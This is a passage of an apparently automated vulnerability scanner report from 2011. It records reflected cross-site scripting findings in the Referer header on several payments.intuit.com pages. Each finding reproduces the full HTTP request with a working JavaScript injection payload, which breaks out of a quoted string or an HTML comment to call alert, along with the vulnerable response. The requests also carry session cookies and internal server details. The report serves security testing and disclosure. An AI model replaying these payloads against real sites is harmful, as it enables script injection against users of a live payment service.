Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Referer: http://www.google.com/search?hl=en&q=74fca'-alert(1)-'5c9bded9b65

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:01:19 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=tTq9ajC5PZElam4-oVcSCw**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:38:20 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95D170C0A0805192AA117E3237716BD
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=check_002dwarranty_002dapply_002dnow_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 161385


                                                                                                                                                                                                                                                                                                                                                                                                               
...[SNIP]...
           // This is assigning the ipsRefer to a variable to capture the referring domain when redirects occure
                       var testReferDomain="0";
                       var eVar17Value = 'http://www.google.com/search?hl=en&q=74fca'-alert(1)-'5c9bded9b65';
                   </script>
...[SNIP]...

1.12. http://payments.intuit.com/apply-now/check-warranty-apply-now.jsp [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /apply-now/check-warranty-apply-now.jsp

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload a8e31--><script>alert(1)</script>c61fa29957 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /apply-now/check-warranty-apply-now.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Referer: http://www.google.com/search?hl=en&q=a8e31--><script>alert(1)</script>c61fa29957

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:01:40 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=wS+X-3WZ22Sb1ieL6oQWjQ**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:38:41 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95D675E0A0805192AA117E370ACEEA8
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=check_002dwarranty_002dapply_002dnow_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 161415


                                                                                                                                                                                                                                                                                                                                                                                                               
...[SNIP]...
<!--http://www.google.com/search?hl=en&q=a8e31--><script>alert(1)</script>c61fa29957 | -->
...[SNIP]...

1.13. http://payments.intuit.com/apply-now/contact-me.jsp [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /apply-now/contact-me.jsp

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 6a2b9'-alert(1)-'7fe9fab8e6e was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /apply-now/contact-me.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Referer: http://www.google.com/search?hl=en&q=6a2b9'-alert(1)-'7fe9fab8e6e

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:00:31 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=iwPi7b+G6IfPR6znHCFUhg**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:37:32 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95C5B0E0A0805192AA117E38A762F0C
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=contact_002dme_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 93324


                                                                                                                                                                                                                                                                                                                                                                                                                               
...[SNIP]...
           // This is assigning the ipsRefer to a variable to capture the referring domain when redirects occure
                       var testReferDomain="0";
                       var eVar17Value = 'http://www.google.com/search?hl=en&q=6a2b9'-alert(1)-'7fe9fab8e6e';
                   </script>
...[SNIP]...

1.14. http://payments.intuit.com/apply-now/contact-me.jsp [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /apply-now/contact-me.jsp

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload 23a44--><script>alert(1)</script>72e2675b5fc was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /apply-now/contact-me.jsp HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Referer: http://www.google.com/search?hl=en&q=23a44--><script>alert(1)</script>72e2675b5fc

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:00:50 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=pM50lYZPFnVXgi0T1ha39Q**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:37:51 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95CA4950A0805192AA117E3F21B5F83
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=contact_002dme_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 93356


                                                                                                                                                                                                                                                                                                                                                                                                                               
...[SNIP]...
<!--http://www.google.com/search?hl=en&q=23a44--><script>alert(1)</script>72e2675b5fc | -->
...[SNIP]...

1.15. http://payments.intuit.com/products/ [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /products/

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload 50367--><script>alert(1)</script>6c1e00f3f20 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /products/ HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Referer: http://www.google.com/search?hl=en&q=50367--><script>alert(1)</script>6c1e00f3f20

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 16:59:25 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=M3gX+mVoiuIkcOt8Esi4Yg**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:36:26 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95B59C30A0805192AA117E3428028B0
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=index_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Vary: Accept-Encoding
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 90447


                                                                                                                                                                                                                                                                                                                                                                                                                               
...[SNIP]...
<!--http://www.google.com/search?hl=en&q=50367--><script>alert(1)</script>6c1e00f3f20 | -->
...[SNIP]...

1.16. http://payments.intuit.com/products/ [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /products/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 70e9a'-alert(1)-'1f622a992cd was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /products/ HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Referer: http://www.google.com/search?hl=en&q=70e9a'-alert(1)-'1f622a992cd

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 16:59:04 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=DO4qqh6ksP6Oy77tMujZxg**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:36:05 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95B06050A0805192AA117E3BEDF55B4
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=index_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Vary: Accept-Encoding
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 90415


                                                                                                                                                                                                                                                                                                                                                                                                                               
...[SNIP]...
           // This is assigning the ipsRefer to a variable to capture the referring domain when redirects occure
                       var testReferDomain="0";
                       var eVar17Value = 'http://www.google.com/search?hl=en&q=70e9a'-alert(1)-'1f622a992cd';
                   </script>
...[SNIP]...

1.17. http://payments.intuit.com/products/basic-payment-solutions/ [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /products/basic-payment-solutions/

Issue detail

The value of the Referer HTTP header is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ab319'-alert(1)-'38984c7dc20 was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /products/basic-payment-solutions/ HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: priorityCode=4899600000; Survey_Tracker=TRUE; INTUIT_SESSIONID=tGSdbLwelOCRtU-utJRwxg**.g25-1; abTestId=0000000000002223720; s_sq=%5B%5BB%5D%5D; BE_CLA=p_id%3DA22NA668LAAPR2JP286L0HARLJ08A4LHLA%26p_last_ref%3D%26s_entry%3Dhttp%253A//quickbooks.intuit.com/%26p_first_ref%3D%26p_first_entry%3Dhttp%253A//quickbooks.intuit.com/%26s_expire%3D1300728122026%26s_id%3DR22NA668LAAPRJNR264L0HARLJ08A4LHLA; Sgmt=default; otc=mlstn%23GAW%3Bfs%23website-building-software-page%3B; SHOPPER_USER_ID=2848631086; SurveyClosed=true; propertySegments=1300726316059%7CQB%3A1%3A%3A%7CQBO%3A1%3A%3A%7CPSD%3A1%3A%3A%7CIWS%3A1%3A%3A; mbox=session#1300724385027-792520#1300726825|PC#1300724385027-792520.17#1303316965|check#true#1300725025; ICOM=%7B%22quicktour%22%3A%7B%22Iws%22%3Atrue%7D%7D; s_cc=true; abTestPriorityCode=0273400000; BASEREFERER=referrerless; qbn.qbo_sc=QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e; s_vi=[CS]v1|26C3BD4E051D3280-400001020000101C[CE]; s_cpm=%5B%5B%27QBC-V51-SUF-HMEPGE%27%2C%271300724516389%27%5D%2C%5B%27QBC-V51-SUF-HMEPGEac3ba%22-alert%28document.cookie%29-%225b1d8ff188e%27%2C%271300724993903%27%5D%5D; abTestGroup=T16;
Referer: http://www.google.com/search?hl=en&q=ab319'-alert(1)-'38984c7dc20

Response

HTTP/1.1 200 OK
Date: Mon, 21 Mar 2011 17:00:42 GMT
Server: Apache
X-Powered-By: Servlet 2.4; JBoss-4.2.0.GA_CP01 (build: SVNTag=JBPAPP_4_2_0_GA_CP01 date=200709131706)/Tomcat-5.5
Set-Cookie: INTUIT_SESSIONID=YrtBHerYg+WK2DeOsiYbiA**.g25-1; Domain=.intuit.com; Path=/
X-ATG-Version: ATGPlatform/2007.1 [ DPSLicense/0 B2BLicense/0 ]
Set-Cookie: SHOPPER_USER_ID=2848631086; Domain=.intuit.com; Expires=Thu, 30-Mar-2045 06:37:43 GMT; Path=/
Set-Cookie: priorityCode=0273400000; Domain=payments.intuit.com; Path=/
Set-Cookie: Sgmt=default; Domain=payments.intuit.com; Path=/
x-wily-info: Clear guid=D95C84210A0805192AA117E3CFC85132
x-wily-servlet: Clear appServerIp=10.8.5.25&agentName=app1&servletName=index_jsp&agentHost=esprdatg25&agentProcess=JBoss
Pragma: no-cache
Cache-Control: no-cache
Expires: Tue, 04 Dec 1993 21:29:02 GMT
Vary: Accept-Encoding
P3P: policyref="http://payments.intuit.com/commerce/common/fragments/popup/popup.jsp?content=privacy",CP="NOI DSP CURa ADMa DEVa TAIa PSAa PSDa OUR IND UNI COM NAV"
Connection: close
Content-Type: text/html;charset=ISO-8859-1
Content-Length: 92653


                                                                                                                                                                                                                                                                                                                                                                                                                               
...[SNIP]...
           // This is assigning the ipsRefer to a variable to capture the referring domain when redirects occure
                       var testReferDomain="0";
                       var eVar17Value = 'http://www.google.com/search?hl=en&q=ab319'-alert(1)-'38984c7dc20';
                   </script>
...[SNIP]...

1.18. http://payments.intuit.com/products/basic-payment-solutions/ [Referer HTTP header]  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://payments.intuit.com
Path:   /products/basic-payment-solutions/

Issue detail

The value of the Referer HTTP header is copied into an HTML comment. The payload 3d056--><script>alert(1)</script>4284ad0a88b was submitted in the Referer HTTP header. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Because the user data that is copied into the response is submitted within a request header, the application's behaviour is not trivial to exploit in an attack against another user. In the past, methods have existed of using client-side technologies such as Flash to cause another user to make a request containing an arbitrary HTTP header. If you can use such a technique, you can probably leverage it to exploit the XSS flaw. This limitation partially mitigates the impact of the vulnerability.

Request

GET /products/basic-payment-solutions/ HTTP/1.1
Host: payments.intuit.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
